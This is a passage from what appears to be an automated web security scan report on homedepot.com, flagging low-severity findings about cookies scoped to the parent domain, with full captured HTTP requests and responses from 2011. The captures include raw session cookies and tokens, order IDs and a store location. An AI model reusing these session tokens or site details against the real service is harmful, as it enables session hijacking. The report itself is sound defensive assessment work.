THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308223632170%3a%3bC25%5fEXP%3d1360063632%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:27:12 GMT;Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Navigation?storeId=10051&categoryID=556456&langId=-1&catalogId=10053&selectedCatgry=SEARCH%20ALL&navFlow=3&searchRedirect=lawn%20mower&Nu=P_PARENT_ID&locStoreNum=4501 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

10.12. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/webapp/wcs/stores/servlet/OrderCalculate

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

THD_SESSION=C1%3d5%3a%3bC1%5fEXP%3d%2d1;Domain=.homedepot.com;Path=/
WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227632737%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cEriWalDUCEKDarFJ9VNwX5TqsXg%3d;Domain=.homedepot.com;Path=/
THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224032057%3a%3bC25%5fEXP%3d1360064032%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:33:52 GMT;Path=/
THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%222%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%243%2c798%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816032%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224032057%3a%3bC25%5fEXP%3d1360064032%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:33:52 GMT;Path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response

HTTP/1.1 302 Moved Temporarily
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Location: http://www.homedepot.com/webapp/wcs/stores/servlet/OrderItemDisplayViewShiptoAssoc?isShowFreeShipping=true&check=*n&contractId=2081191&jspStoreDir=hdus&amtLeftForFreeShip=0&itemAdd=true&orderId=129781024&catalogId=10053&quantity=1&isOrderQualifiesForFreeShip=true&orderItemId_0=330520025&orderItemId=330520025&langId=-1&catEntryId=202562705&storeId=10051&ddkey=OrderCalculate
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 16 Jun 2011 11:33:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:33:57 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224032057%3a%3bC25%5fEXP%3d1360064032%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:33:52 GMT;Path=/
Set-Cookie: THD_SESSION=C1%3d5%3a%3bC1%5fEXP%3d%2d1;Domain=.homedepot.com;Path=/
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%222%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%243%2c798%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816032%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224032057%3a%3bC25%5fEXP%3d1360064032%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:33:52 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227632737%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cEriWalDUCEKDarFJ9VNwX5TqsXg%3d;Domain=.homedepot.com;Path=/

10.13. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderItemAddService previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/webapp/wcs/stores/servlet/OrderItemAddService

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227739722%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cYAeXFdjXVbkwxwNU3QRHbu8%2f1Ko%3d;Domain=.homedepot.com;Path=/
THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224133796%3a%3bC25%5fEXP%3d1360064133%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:35:33 GMT;Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/OrderItemAddService?langId=-1&storeId=10051&catalogId=10053&catEntryId_1=202642971&Quantity_1=1&quantity_1=1 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/QuickViewService?langId=-1&storeId=10051&catalogId=10053&R=202642971&catEntryId=202642971
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_SESSION=C1%3d5%3a%3bC1%5fEXP%3d%2d1; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%222%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%243%2c798%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816094%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224094066%3a%3bC25%5fEXP%3d1360064094%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227694814%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cufvYdumw7ZxHWtTtpzjDpT0%2bqW0%3d; s_pers=%20s_scOpen%3D1%7C1308225928423%3B%20s_campaign%3Dno%2520value%7C1308225928433%3B%20s_prevPage%3Dno%2520value%7C1308225928439%3B%20p_30%3Dno%2520value%7C1308225928457%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20p_v62%3Dnon-major%2520appliance%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 140
Expires: Thu, 16 Jun 2011 11:35:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:35:39 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224133796%3a%3bC25%5fEXP%3d1360064133%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:35:33 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227739722%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cYAeXFdjXVbkwxwNU3QRHbu8%2f1Ko%3d;Domain=.homedepot.com;Path=/

{"ItemsAdded":[],"ItemsAddFailure":[{"CatEntryId":"202642971","ProductName":"1","ErrorMessage":"No Inventory"}]}

10.14. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderItemDisplay previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/webapp/wcs/stores/servlet/OrderItemDisplay

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630917%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cDh3V6mSqM3U%2bN9D0AIqw32W81OA%3d;Domain=.homedepot.com;Path=/
THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030890%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:33:50 GMT;Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/OrderItemDisplay?jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&catalogId=10053&quantity=1&orderItemId_0=330520025&orderItemId=330520025&langId=-1&catEntryId=202562705&storeId=10051&ddkey=OrderItemAdd HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224029646%3a%3bC25%5fEXP%3d1360064029%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630141%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cwD0O4YDr3%2f35oqr%2b4vJ6YCxfvjU%3d

Response

HTTP/1.1 302 Moved Temporarily
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Location: http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 16 Jun 2011 11:33:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:33:50 GMT
